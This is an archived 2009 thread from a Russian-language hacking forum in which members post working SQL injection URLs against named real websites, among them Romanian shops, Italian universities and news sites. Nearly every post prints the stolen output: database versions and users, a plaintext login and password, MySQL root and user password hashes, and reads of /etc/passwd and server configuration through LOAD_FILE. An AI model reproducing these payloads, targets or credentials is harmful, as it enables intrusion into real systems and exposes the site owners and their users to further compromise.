ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8181  
Старый 06.03.2009, 19:19
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.monavissa.ro/pagini.php?pag_id=-4'+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5/*


Database Version: 4.1.22-log
Database name: monavissa_new
User name: monavissa@localhost
 
Ответить с цитированием

  #8182  
Старый 06.03.2009, 19:31
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.cpaug.org/publications.php?Id=-1+union+all+select+0,concat_ws(0x3a,username,password),2,3,4,5+from+users--
Логин/пасс:

Код:
Sema:nakiseki
Код:
http://www.cpaug.org/publications.php?Id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5+from+users--
версия/юзер/бд:


Код:
4.0.21:cpaug.org@195.249.40.97:cpaug_org

------------------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8183  
Старый 06.03.2009, 20:31
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.ewclid.ru/news/?id=-164+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5--&returnto=0&n=1
Database Version : 4.0.27
Database name : ewclid2
User name : comcom@hosting.rusoft.ru


сбрутил только логин:

Код:
http://www.ewclid.ru/news/?id=-164+union+select+1,log in,3,4,5+from+users--&returnto=0&n=1
 
Ответить с цитированием

  #8184  
Старый 06.03.2009, 21:11
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
Провел на форуме:
2816163

Репутация: 158
По умолчанию

www.themusichutch.com (pr 4)

Код:
http://www.themusichutch.com/listen.php?songid=41348+union+select+0,1,2,3,version(),5,6,7,8,9,10,11,12,13,14,table_name+from+INFORMATION_SCHEMA.TABLES%20LIMIT+1,1--

tables:
md_emails
mh_invites
mh_logins

Последний раз редактировалось jokester; 06.03.2009 в 21:14.. Причина: agrifoodskills.net.au БОЯН
 
Ответить с цитированием

  #8185  
Старый 06.03.2009, 23:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.sbx-re.ro/anunturi-imobiliare-sbx-1590+AND+ASCII(SUBSTRING((select+version() ),1,1))=x/*.html

x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,1 00

http://www.sbx-re.ro/anunturi-imobiliare-sbx-1590+AND+ASCII(SUBSTRING((select+database() ),1,1))=x/*.html

x=114,111,109,97,110,105,97,105,95,100,98


http://www.sbx-re.ro/anunturi-imobiliare-sbx-1590+AND+ASCII(SUBSTRING((select+user() ),1,1))=x/*.html

x=114,111,109,97,110,105,97,105,95,111,118,105,100 ,105,117,64,108,111,99,97,108,104,111,115,116

Version : 4.1.22-standard
Database : romaniai_db
User : romaniai_ovidiu@localhost




http://www.romaniaimobiliare.ro/anunturi-imobiliare-proprietari-5779+AND+ASCII(SUBSTRING((select+user() ),11,1))=x/*.html?pag_language=ro

выдает те же самые данные что и первый сайт...
 
Ответить с цитированием

  #8186  
Старый 06.03.2009, 23:48
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.tonicompany.ro/index.php?command=categproduse&sid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6&pag=3


Database Version: 5.0.67-community-log
Database name: tonicomp_tonitrading
User name: tonicomp_vlad@localhost


http://www.turisminromania.ro/index.php?judet=10+UNION+SELECT+1,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49+limit+1,1--


Database Version: 5.0.51a-log
Database name: turisminromania_ro_turisminromania
User name: 1329web@192.168.88.2


Respekt R1dex !

Последний раз редактировалось Gorev; 07.03.2009 в 01:36..
 
Ответить с цитированием

  #8187  
Старый 07.03.2009, 09:09
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PR- 6

Цитата:
http://www.businessghana.com/portal/directory/index.php?op=getSubDirectories&category=IT&id=4+un ion+select+concat_ws(0x3a,version(),user(),databas e()),2,3,4--
Database Version: 5.0.67-community
Database name: repo_bg
User name: repo_repo@localhost


PR - 6

Цитата:
http://www.gjc.it/2006/en/show_2007.php?id=747897988898+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11,12--
Version: 4.1.21-standard-log
User: gjc@localhost
Database: gjc2006


Цитата:
http://it.ut.ac.ir/research_projects_en_frame.php?id=8908097654+UNION +SELECT+1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,U ser(),0x3a),0x71),0x71),13,14,15,16,17,18,19--

Database Version: 4.1.10a
Database name: it
User name: itmodir@localhost


PR - 5

Цитата:
http://www.mvtimes.com/as-you-see-it/image.php?cat=-10+union+select+concat_ws(0x3a,version(),user(),da tabase())--&id=4

Version:5.0.27
User:mvtimes@localhost
Database:mvtdb


PR - 4

Цитата:
http://www.mediamorphosis.it/en/news.php?id=8907987654+union+select+1,concat_ws(0x 3a,version(),user(),database()),3,4,5--

Version:4.0.24_Debian-10sarge3-log
User:media@localhost
Database:morpho



PR - 4


Цитата:
http://thatday.it/eng/press_view.php?id=809809809868764+union+select+1,2 ,3,4,5,6,7,concat_ws(0x3a,version(),user(),databas e()),9,10--
Version:5.0.22-Debian_0ubuntu6.06.10
User:thatday01@localhost
Database:thatday_db1





PageRank = 5


Цитата:
http://www.dm.univaq.it/page.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database())--&id_menu=13
Database Version: 5.0.37
Database name: becontent
User name: root@localhost

Цитата:
http://www.dm.univaq.it/page.php?id=-4+union+select+1,2,concat_ws(0x3a,user,password)+f rom+mysql.user--&id_menu=13
root : 43b15bb255f188a4

Читаем etc/passwd

Цитата:
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F65746 32F706173737764),0x3a)--&id_menu=13
Читаем /etc/httpd/conf/httpd.conf

Цитата:
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F65746 32F68747470642F636F6E662F68747470642E636F6E66),0x3 a)-- &id_menu=13

Читаем /var/www/html/index.php

Цитата:
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F76617 22F7777772F68746D6C2F696E6465782E706870),0x3a)-- &id_menu=13

Читаем /var/www/html/include/template.inc.php

Цитата:
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F76617 22F7777772F68746D6C2F696E636C7564652F74656D706C617 4652E696E632E706870),0x3a)-- &id_menu=13

Копаемся дальше в поисках нужной нам информации.Вопрос в том что нам нужно там -)))



Еще один Рут на пятёрочке итальянской....



Цитата:
http://www.economia.unipd.it/didattica/index.php?sezione=DIDATTICA&sub=63&macro=3&id=-4+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4--&prev=1&corso=ECO2120

4.0.5a-beta-log
wwwadm@localhost
Economia


Цитата:
http://www.economia.unipd.it/didattica/index.php?sezione=DIDATTICA&sub=63&macro=3&id=-4+union+select+concat_ws(0x3a,user,password),2,3,4 +from+mysql.user--&prev=1&corso=ECO2120

root : 6ebe97855d5cfacb

Последний раз редактировалось spherics; 07.03.2009 в 10:51..
 
Ответить с цитированием

  #8188  
Старый 07.03.2009, 11:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

hibiny.ru

Код:
http://www.hibiny.ru/tourism/cam.php?id=-2%20union%20select%20version()/*
version(): 5.0.45
user(): u56119@localhost
 
Ответить с цитированием

  #8189  
Старый 07.03.2009, 11:21
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.pi2s2.it/applications/application_details.php?ID=897987984798798798+unio n+select+1,concat_ws(0x3a,version(),user(),databas e()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40--
Version:5.0.45
User:root@localhost
Databasei2s2_applications


Цитата:
http://www.pi2s2.it/applications/application_details.php?ID=897987984798798798+unio n+select+1,concat_ws(0x3a,user,password),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+fr om+mysql.user--
root:40dcd73246a08b24
user_appweb:60776d8c1b2603fe
support_cometa:4d88db586081c8e1
support_gilda:59456f66536f08a2
quest_user:3fca398228ffeb0d
cometa:0b0499ae0af29196
triadmin:4db2e1f0371bb23c
user_trigrid:799f669976a96721
user_gridct:071161424fdd32d6
user_tutorial:5a6f10b433888a81
sgadmin:40b75bf20b89fd7f
cdsprova:12bb79285094f6c9
momentaneo:12bb79285094f6c9
cdscometa:2d98430975596ec0
cdsagenda:3285d95736219716
user_egroup:309830266c320655
inveniocometa:2a67070b5a1f24d6
cds_cometa:5c8b8ed8746fe245
cometaagenda:0b0499ae0af29196
user_application:60776d8c1b2603fe
school_cairo:40b743500b89f4dd
quest_infn:3f17c5654c4efe74
joomla_cometa:2526327f78e49d24
grisu_user:05e18b2f6159ffb3
emidio_test:4200820054e0fa20
userinaf:45359d850a65b59c
na4_appl:3a696946195acda9
 
Ответить с цитированием

  #8190  
Старый 07.03.2009, 12:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://atecdrexim.ro/textile/index.php?command=categproduse&sid=-10+union+select+1,concat_Ws(0x3a,version(),databas e(),user()),3,4,5

Database Version: 5.0.67-community-log
Database name: atecdrex_textile
User name: atecdrex_user@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ